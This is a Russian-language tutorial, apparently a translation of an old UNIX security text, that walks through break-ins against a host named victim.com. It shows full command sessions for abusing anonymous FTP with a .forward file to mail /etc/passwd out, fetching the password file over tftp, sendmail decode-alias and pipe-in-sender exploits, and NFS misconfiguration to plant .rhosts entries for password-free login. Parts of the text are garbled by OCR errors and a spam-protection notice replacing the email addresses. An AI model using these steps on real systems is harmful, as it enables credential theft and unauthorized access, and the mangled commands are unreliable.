Атака с использованием анонимного ftp

Анонимный ftp-сервис (обнаружить его наличие чрезвычайно легко, и это не должно возбуждать никаких подозрений) может служить легким способом получения доступа, поскольку его часто неправильно конфигурируют. Например, система может иметь полную копию файла /etc/passwd в каталоге Hftp/etc вместо урезанной версии — со всеми вытекающими отсюда последствиями (см. предыдущий пункт). Кроме того, можно применить и более изощренный способ — в следующем примере домашний каталог специального пользователя ftp на victim.com доступен для записи. Это позволяет послать по почте самому себе файл /etc/passwd атакуемой машины. Для этого надо создать файл. forward в домашнем каталоге ftp, который выполняется, когда пользователю ftp посылается почта. Происходит это следующим образом:

|/bin/ Этот адрес e-mail защищен от спам-ботов. Чтобы увидеть его, у Вас должен быть включен Java-Script < /etc/passwd evil % ftp victim.com Connected to victim.com 220 victim FTP server ready.

Name (victim.com:hackcr): ftp.

331 Guest login ok, send ident as password.

Password: *****.

• 230 Guest login ok, access restrictions apply. ftp> Islga
• 200 PORT command successful.
• 150 ASCII data connection for/bin/ls (192.192.192.1,1129) (0 bytes), total 5

drwxr-xr-x 4 101 1 512Jun20 1991. drwxr-xr-x 4 101 1 512 Jun 20 1991. drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete.

242 bytes received in 0.066 seconds (3.6 Kbytes/s) ftp> put forward_sucker_file .forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s) ftp> quit.

evil % echo test | mail Этот адрес e-mail защищен от спам-ботов. Чтобы увидеть его, у Вас должен быть включен Java-Script.

Теперь можно просто сидеть и ждать, когда файл с паролями будет послан обратно. Очевидно, что такая атака (как и следующая) является типичной по сценарию 2.

Рассматривая ftp, можно проверить более старую ошибку:

% ftpп.

ftp> open victim.com Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp.

• 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp
• 230 Guest login ok, access restrictions apply.

ftp> Isal /.

Если этот прием сработал, то атакующий теперь вошел в систему как системный администратор (root). Если данная ошибка имеется в системе, то следует обязательно обновить ftpd.

Далее мы еще рассмотрим более свежие «дыры» в ftp-демонах. Использование tftp-tftpd

Этот демон не требует пароля для аутентификации. Если хост предоставляет tftp без ограничения доступа (обычно с помощью установокфлагов безопасности в файле inctd. conf), то атакующий получает доступ по чтению и записи к любым файлам. Например, он может получить файл паролей с удаленной машины и разместить его в локальном каталоге /tmp: evil % tftp.

tftp> connect victirn.com.

tftp> get /etc/passwd/tmp/passwd.victim.

tftp> quit.

Это является атакой по сценарию 2.

Проникновение в систему с помощью sendmail

Sendmail — это очень сложная программа, у которой всегда было много проблем с безопасностью, включая печально известную команду «debug». С ее помощью, например, зачастую можно получить некоторую информацию об удаленной системе, иногда вплоть до номера версии, анализируя ее сообщения. Это дает возможность определить наличие в системе известных ошибок. Кроме того, можно увидеть, запущен ли псевдоним «decode», имеющий ряд проблем:

evil % telnet victim.com 25 connecting to host victim.com (128.128.128.1.), port 25 connection open.

220 victim.com Sendmail.

Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT cxpn decode.

quit.

Наличие псевдонима decode подвергает систему риску, что злоумышленник может изменить любые файлы, доступные для записи владельцу этого псевдонима, которым, как правило, является демон. Этот фрагмент кода поместит evil.com в файл. rhosts пользователя hacker, если он доступен для записи: evil % echo «evil.com» | uuencode /home/hacker/.rhosts | mail Этот адрес e-mail защищен от спам-ботов. Чтобы увидеть его, у Вас должен быть включен Java-Script.

В части sendmail, отвечающей за пересылку, были две хорошо известные ошибки. Первая была устранена в версии 5.59 Berkeley. Для версий sendmail до 5.59 в приведенном примере, несмотря на сообщения об ошибках, «evil.com» добавляется к файлу. rhosts вместе с обычными почтовыми заголовками:

% cat evil_scndmail.

telnet victim.com 25 «EOSM.

rept to: /home/hackcr/.rhosts.

mail from: hacker.

data.

rept to:/home/hacker/.rhosts.

mail from: hacker.

data.

evil.com.

Quit.

EOSM.

evil % /bin/sh evil_sendmail Trying 128.128.128.1.

Connected to victim.com Escape character is ^{, A}].

Connection closed by foreign host, evil % rlogin victim.com -1 hacker Welcome to victim.com! victim %.

Вторая ошибка, исправленная недавно, позволяла кому угодно задавать произвольные команды оболочки и/или пути для посылающей и/или принимающей стороны. Попытки сохранить детали в секрете были тщетными, и широкая дискуссия в эхо-конференциях привела к обнародованию того, как можно использовать некоторые ошибки. Как и для большинства других ошибок UNIX, почти все системы оказались уязвимы для этих атак, поскольку все они имели в основе один и тот же исходный текст. Типичная атака с помощью sendmail, направленная па получение пароля, может выглядеть так:

evil % telnet victim.com 25 Trying 128.128.128.1 Connected to victim.com Escape character is ^{, A}].

• 220 victim.com Sendmail 5.55 ready at Saturday,
• 6 Nov 93 18:04

mail from: «|/bin/mail Этот адрес e-mail защищен от спам-ботов. Чтобы увидеть его, у Вас должен быть включен Java-Script < /etc/passwd» .

250 «|/bin/mail Этот адрес e-mail защищен от спам-ботов. Чтобы увидеть его, у Вас должен быть включен Java-Script < /etc/passwd» …

Sender ok.

rept to: nosuchuser.

550 nosuchuser… User unknown.

Data.

• 354 Enter mail, end with on a line by itself
• 250 Mail accepted Quit

Connection closed by foreign host, evil %.

Видно, что все атаки на sendmail идут на уровне незарегистрированного удаленного пользователя, и поэтому относятся к сценарию 1. Ну, а к sendmail мы еще вернемся.

Атаки на доверие Ниже перечисляемые атаки основаны на типовом сценарии 4.

С использованием неправильного администрирования NFS

Предположим, что запуск программы showmount с параметром «атакуемый хост» покажет следующее: evil % showmountе victim.com export list for victim.com:

/export (everyone).

/var (everyone).

/usr easy.

/export/exec/kvm/sun4c.sunos.4.1.3 easy /export/ root/easy easy /export/swap/easy easy.

Трудно не заметить, что /export и все его подкаталоги экспортируются во внешнюю среду. Предположим (это можно выяснить с помощью finger), что домашним каталогом пользователя guest является /export/foo. Теперь с помощью этой информации можно осуществить первое вторжение. Для этого монтируется домашний каталог пользователя guest удаленной машины. Поскольку даже суперпользователь атакующей машины не может модифицировать файлы на файловой системе, смонтированной как NFS, необходимо обмануть NFS и создать фиктивного пользователя guest в локальном файле паролей. Далее стандартно эксплуатируется «излишнее доверие», и атакующая машина victim.com вставляется в файл. rhosts в удаленном домашнем каталоге guest, что позволит зарегистрироваться в атакуемой машине, не предоставляя пароля: evil # mount victim.com:/export/foo /foo evil # cd /foo evil # Islag total 3.

• 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
• 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .
• 1 drwx—x—x 9 10 001 daemon 1024 Aug 3 15:49 guest

evil # echo guest: x: 10 001:1 временно для взлома:/: «/etc/passwd.

evil # su guest.

evil % echo victim.com «guest/.rhosts evil % rlogin victim.com Welcome to victim.com! victim %

Если бы victim.com не экспортировал домашние каталоги пользователей, а только пользовательские каталоги с программами (скажем, /usr или /usr/local/bin), можно было бы заменить команду троянским конем, который бы выполнял те же операции.